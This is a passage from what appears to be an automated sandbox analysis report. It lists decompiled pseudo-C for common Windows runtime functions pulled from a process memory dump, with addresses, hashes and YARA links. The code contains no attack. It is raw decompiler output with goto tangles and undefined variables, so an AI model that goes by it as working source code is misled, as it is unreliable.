									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E05362280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E054188F5(0x54385ec, _t85, 0x5435388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0538AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x543b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x54384c0;
																			if(_t82 >=  *0x54384c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E05419063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0534922A(_t99);
										_t64 = E05367D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E05418B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x54386c0; // 0x35907b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x54386b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x54386bc;
													_t87 = 0x54386b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E05349240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x54386c4;
												_t87 = 0x54386c0;
												L27:
												E05379B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0539D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x5435388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x543538c = _t51;
						goto L6;
					}
				}
			}




















                                      0x05349082
                                      0x05349083
                                      0x05349084
                                      0x05349085
                                      0x05349087
                                      0x05349096
                                      0x05349098
                                      0x05349098
                                      0x0534909e
                                      0x053490a8
                                      0x053490e7
                                      0x053490e7
                                      0x053490aa
                                      0x053490b0
                                      0x053490b7
                                      0x053490bd
                                      0x053490dd
                                      0x053490e6
                                      0x053490bf
                                      0x053490bf
                                      0x053490c7
                                      0x053490cf
                                      0x053490f1
                                      0x053490f2
                                      0x053490f4
                                      0x053490f5
                                      0x053490f6
                                      0x053490f7
                                      0x053490f8
                                      0x053490f9
                                      0x053490fa
                                      0x053490fb
                                      0x053490fc
                                      0x053490fd
                                      0x053490fe
                                      0x053490ff
                                      0x05349100
                                      0x05349102
                                      0x05349107
                                      0x0534910c
                                      0x05349110
                                      0x05349113
                                      0x05349115
                                      0x05349136
                                      0x0534913f
                                      0x05349143
                                      0x053a37e4
                                      0x053a37e4
                                      0x05349117
                                      0x05349117
                                      0x0534911d
                                      0x00000000
                                      0x0534911f
                                      0x0534911f
                                      0x05349125
                                      0x00000000
                                      0x05349127
                                      0x0534912d
                                      0x05349130
                                      0x05349134
                                      0x05349158
                                      0x0534915d
                                      0x05349161
                                      0x05349168
                                      0x053a3715
                                      0x0534916e
                                      0x0534916e
                                      0x05349175
                                      0x05349177
                                      0x0534917e
                                      0x0534917f
                                      0x05349182
                                      0x05349182
                                      0x05349187
                                      0x05349187
                                      0x0534918a
                                      0x0534918d
                                      0x0534918f
                                      0x05349192
                                      0x05349195
                                      0x05349198
                                      0x05349198
                                      0x05349198
                                      0x0534919a
                                      0x00000000
                                      0x00000000
                                      0x053a371f
                                      0x053a3721
                                      0x053a3727
                                      0x053a372f
                                      0x053a3733
                                      0x053a3735
                                      0x053a3738
                                      0x053a373b
                                      0x053a373d
                                      0x053a3740
                                      0x00000000
                                      0x053a3746
                                      0x053a3746
                                      0x053a3749
                                      0x00000000
                                      0x053a374f
                                      0x053a374f
                                      0x053a3751
                                      0x053a3757
                                      0x053a3759
                                      0x053a375c
                                      0x053a375c
                                      0x053a375e
                                      0x053a375e
                                      0x053a3761
                                      0x053a3764
                                      0x00000000
                                      0x00000000
                                      0x053a3766
                                      0x053a3768
                                      0x053a37a3
                                      0x053a37a3
                                      0x053a37a5
                                      0x053a37a7
                                      0x053a37ad
                                      0x053a37b0
                                      0x053a37b2
                                      0x053a37bc
                                      0x053a37c2
                                      0x053a37c2
                                      0x053a37b2
                                      0x05349187
                                      0x05349187
                                      0x0534918a
                                      0x0534918d
                                      0x0534918f
                                      0x05349192
                                      0x05349195
                                      0x00000000
                                      0x05349195
                                      0x00000000
                                      0x053a376a
                                      0x053a376a
                                      0x053a376a
                                      0x053a376c
                                      0x053a376c
                                      0x053a376f
                                      0x053a3775
                                      0x00000000
                                      0x00000000
                                      0x053a3777
                                      0x053a3779
                                      0x053a3782
                                      0x053a3787
                                      0x053a3789
                                      0x053a3790
                                      0x053a3790
                                      0x053a378b
                                      0x053a378b
                                      0x053a378b
                                      0x053a3792
                                      0x053a3795
                                      0x00000000
                                      0x053a3795
                                      0x00000000
                                      0x053a3779
                                      0x053a3798
                                      0x00000000
                                      0x053a3798
                                      0x00000000
                                      0x053a3768
                                      0x053a379b
                                      0x053a379b
                                      0x053a3751
                                      0x053a3749
                                      0x00000000
                                      0x053a3740
                                      0x053491a0
                                      0x053491a3
                                      0x053491a9
                                      0x053491b0
                                      0x00000000
                                      0x053491b0
                                      0x05349187
                                      0x053491b4
                                      0x053491b4
                                      0x053491bb
                                      0x053491c0
                                      0x053491c5
                                      0x053491c7
                                      0x053a37da
                                      0x053491cd
                                      0x053491cd
                                      0x053491cd
                                      0x053491d2
                                      0x053491d5
                                      0x05349239
                                      0x05349239
                                      0x053491d7
                                      0x053491db
                                      0x053491e1
                                      0x053491e7
                                      0x053491fd
                                      0x05349203
                                      0x0534921e
                                      0x05349223
                                      0x00000000
                                      0x05349205
                                      0x05349205
                                      0x05349208
                                      0x0534920c
                                      0x05349214
                                      0x05349214
                                      0x0534920c
                                      0x053491e9
                                      0x053491e9
                                      0x053491ee
                                      0x053491f3
                                      0x053491f3
                                      0x053491f3
                                      0x053491e7
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05349134
                                      0x05349125
                                      0x0534911d
                                      0x0534914e
                                      0x053490d1
                                      0x053490d1
                                      0x053490d3
                                      0x053490d6
                                      0x053490d8
                                      0x00000000
                                      0x053490d8
                                      0x053490cf

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 363d7357ec596ff6c32c71d4b1b11dc328a8e68be57bea6375f4d6cedd9c8bef
                                      • Instruction ID: 23ea25b048935856878ca6a91b03b63d347fc2c7f41c0cab4409b76a7313138e
                                      • Opcode Fuzzy Hash: 363d7357ec596ff6c32c71d4b1b11dc328a8e68be57bea6375f4d6cedd9c8bef
                                      • Instruction Fuzzy Hash: 26018CB36156048FC7299F18E884B62BBFAFB85320F254066F5058B6A1C7B4EC41CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05414015, Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E05414015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E05362280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E05362280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x54386ac);
					E0534F900(0x54386d4, _t28);
					E0535FFB0(0x54386ac, _t28, 0x54386ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0535FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                      0x0541401a
                                      0x0541401e
                                      0x05414023
                                      0x05414028
                                      0x05414029
                                      0x0541402b
                                      0x0541402f
                                      0x05414043
                                      0x05414046
                                      0x05414051
                                      0x05414057
                                      0x0541405f
                                      0x05414062
                                      0x05414067
                                      0x0541406f
                                      0x0541407c
                                      0x0541407c
                                      0x0541408c
                                      0x0541408c
                                      0x05414097

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d9b3035d1400c9141cc88f9a0955031ae3a31dadd5151964d096bcc250b774fe
                                      • Instruction ID: 94f5b146f0a7dfa100dd46c07af58cdfe3c8cbf9bc594a360b0c5ea3bafd1d62
                                      • Opcode Fuzzy Hash: d9b3035d1400c9141cc88f9a0955031ae3a31dadd5151964d096bcc250b774fe
                                      • Instruction Fuzzy Hash: 010184713415457FC751AB79CD84E57F7ACFB49664B00022AB908C3A11DB38EC11C6E4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 054014FB, Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 61%
                                      			E054014FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x543d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0538FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E05367D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0538B640(E05389AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                      0x054014fb
                                      0x054014fb
                                      0x0540150a
                                      0x05401514
                                      0x05401519
                                      0x0540151b
                                      0x05401526
                                      0x0540152c
                                      0x05401534
                                      0x05401537
                                      0x0540153a
                                      0x05401545
                                      0x05401557
                                      0x05401547
                                      0x05401550
                                      0x05401550
                                      0x05401562
                                      0x05401563
                                      0x05401565
                                      0x0540156a
                                      0x0540157f

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9f42c7a910b29f8afda39dd6d402ae8e68c1b197979ca28a6b2d867fc9904f7
                                      • Instruction ID: 6ba28892c0ee3f199695ae0852d56ed30cd9f1a43bb799ab7abd13a0d44aca12
                                      • Opcode Fuzzy Hash: c9f42c7a910b29f8afda39dd6d402ae8e68c1b197979ca28a6b2d867fc9904f7
                                      • Instruction Fuzzy Hash: 64018071A00248AFDB04EF68D845EAEBBB8EF44710F404066B905EB280DA74DA00CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0540138A, Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 61%
                                      			E0540138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x543d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0538FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E05367D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0538B640(E05389AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                      0x0540138a
                                      0x0540138a
                                      0x05401399
                                      0x054013a3
                                      0x054013a8
                                      0x054013aa
                                      0x054013b5
                                      0x054013bb
                                      0x054013c3
                                      0x054013c6
                                      0x054013c9
                                      0x054013d4
                                      0x054013e6
                                      0x054013d6
                                      0x054013df
                                      0x054013df
                                      0x054013f1
                                      0x054013f2
                                      0x054013f4
                                      0x054013f9
                                      0x0540140e

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f9a577777e11a3fbcf40b5cfe3451db869feccb38f77c04f4d4e5956a6828ab5
                                      • Instruction ID: 9ce05ecabbec755309c1b0e70fc206ba12e4ca6796b97f324d109112834f4e25
                                      • Opcode Fuzzy Hash: f9a577777e11a3fbcf40b5cfe3451db869feccb38f77c04f4d4e5956a6828ab5
                                      • Instruction Fuzzy Hash: 1F015671E04318AFDB14EFA9D885FAEB7B8EF44750F504066B905EB380D674DA01C794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053458EC, Relevance: .0, Instructions: 47COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 91%
                                      			E053458EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x543d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x5325c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E05345943() != 0 &&  *0x5435320 > 5) {
					E053C7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E053C7B5E( &_v28, _t28);
					_t11 = E053C7B9C(0x5435320, 0x532bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0538B640(_t11, _t17, _v8 ^ _t29, 0x532bf15, _t27, _t28);
			}















                                      0x053458fb
                                      0x053458fe
                                      0x05345906
                                      0x0534590a
                                      0x0534593c
                                      0x0534593c
                                      0x0534590c
                                      0x0534590c
                                      0x05345911
                                      0x00000000
                                      0x05345913
                                      0x05345913
                                      0x05345913
                                      0x05345911
                                      0x0534591d
                                      0x053a1035
                                      0x053a103c
                                      0x053a103f
                                      0x053a1056
                                      0x053a1056
                                      0x0534593b

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e5ad159d858e2ee729e580554aa8b2c852e108567b600389ab68235fc95d3238
                                      • Instruction ID: 222cbb387fa97e52788c2eaa828b3fff7283fa809aeaf7dc12bfecb32e3493ec
                                      • Opcode Fuzzy Hash: e5ad159d858e2ee729e580554aa8b2c852e108567b600389ab68235fc95d3238
                                      • Instruction Fuzzy Hash: 44018F35F185149BC714EA29E8559EEBBFDEB44260F9400A9A8069B650DE70ED01CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053FFE3F, Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 59%
                                      			E053FFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x543d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0538FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E05367D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0538B640(E05389AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                      0x053ffe3f
                                      0x053ffe3f
                                      0x053ffe4e
                                      0x053ffe58
                                      0x053ffe5d
                                      0x053ffe5f
                                      0x053ffe6a
                                      0x053ffe72
                                      0x053ffe75
                                      0x053ffe78
                                      0x053ffe83
                                      0x053ffe95
                                      0x053ffe85
                                      0x053ffe8e
                                      0x053ffe8e
                                      0x053ffea0
                                      0x053ffea1
                                      0x053ffea3
                                      0x053ffea8
                                      0x053ffebd

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 49bed0aad114328da11cce6aad9e990fea90524657cdaacc2600c23e47561b7f
                                      • Instruction ID: 6356196599684d06b6de8a71a0ce40a023ff1a48619734acd5538a06a6c9646b
                                      • Opcode Fuzzy Hash: 49bed0aad114328da11cce6aad9e990fea90524657cdaacc2600c23e47561b7f
                                      • Instruction Fuzzy Hash: 15018471F04308AFDB18EFA9D845FBEBBB8EF44714F004066B901AB291DA74DA01C794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053FFEC0, Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 59%
                                      			E053FFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x543d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0538FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E05367D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0538B640(E05389AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                      0x053ffec0
                                      0x053ffec0
                                      0x053ffecf
                                      0x053ffed9
                                      0x053ffede
                                      0x053ffee0
                                      0x053ffeeb
                                      0x053ffef3
                                      0x053ffef6
                                      0x053ffef9
                                      0x053fff04
                                      0x053fff16
                                      0x053fff06
                                      0x053fff0f
                                      0x053fff0f
                                      0x053fff21
                                      0x053fff22
                                      0x053fff24
                                      0x053fff29
                                      0x053fff3e

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 90cad5409da4705552121341cb61fb3ee50e0d06824575965c9122b891e97ca7
                                      • Instruction ID: 7608186d63b1f8ce7f6b7e1c0e903d7ff2381371b161bb96db5797fe891e0eda
                                      • Opcode Fuzzy Hash: 90cad5409da4705552121341cb61fb3ee50e0d06824575965c9122b891e97ca7
                                      • Instruction Fuzzy Hash: 7A018471E00348AFDB14EBA9D845FBEBBB8EF44710F404066B901AB290DA74DA01C794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0535B02A, Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0535B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E05367D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E053C7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                      0x0535b037
                                      0x0535b039
                                      0x0535b03b
                                      0x0535b040
                                      0x053aa60e
                                      0x00000000
                                      0x00000000
                                      0x053aa61d
                                      0x0535b04b
                                      0x0535b04e
                                      0x053aa627
                                      0x053aa634
                                      0x00000000
                                      0x00000000
                                      0x053aa641
                                      0x053aa653
                                      0x053aa643
                                      0x053aa64c
                                      0x053aa64c
                                      0x053aa65b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053aa66c
                                      0x0535b057
                                      0x0535b057
                                      0x0535b057
                                      0x0535b046
                                      0x0535b046
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                      • Instruction ID: 0ce9ff4b074b264b1c5e76a51b115252235312197cfed1e1da46d24db5e0dcef
                                      • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                      • Instruction Fuzzy Hash: B6017C722049809FD326C71CC998F76B7DDFB85664F0940A5E91ACBAA1D7A9DC40CA20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05411074, Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E05411074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0541165E(__ebx, 0x5438ae4, (__edx -  *0x5438b04 >> 0x14) + (__edx -  *0x5438b04 >> 0x14), __edi, __ecx, (__edx -  *0x5438b04 >> 0x14) + (__edx -  *0x5438b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0540AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E05367D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E053FFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                      0x05411074
                                      0x05411080
                                      0x05411082
                                      0x0541108a
                                      0x0541108f
                                      0x05411093
                                      0x054110ab
                                      0x054110ab
                                      0x054110c3
                                      0x054110cf
                                      0x054110e1
                                      0x054110d1
                                      0x054110da
                                      0x054110da
                                      0x054110e9
                                      0x054110f5
                                      0x054110f5
                                      0x054110fe

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 50e148e3a8f15eb77db1e6fd614111362c037eb099848c0b5e0b7275613194d8
                                      • Instruction ID: 4219584cbc95edbdab222519c3eae70a3c3c994f233dfe8278fce8e2f5e73f92
                                      • Opcode Fuzzy Hash: 50e148e3a8f15eb77db1e6fd614111362c037eb099848c0b5e0b7275613194d8
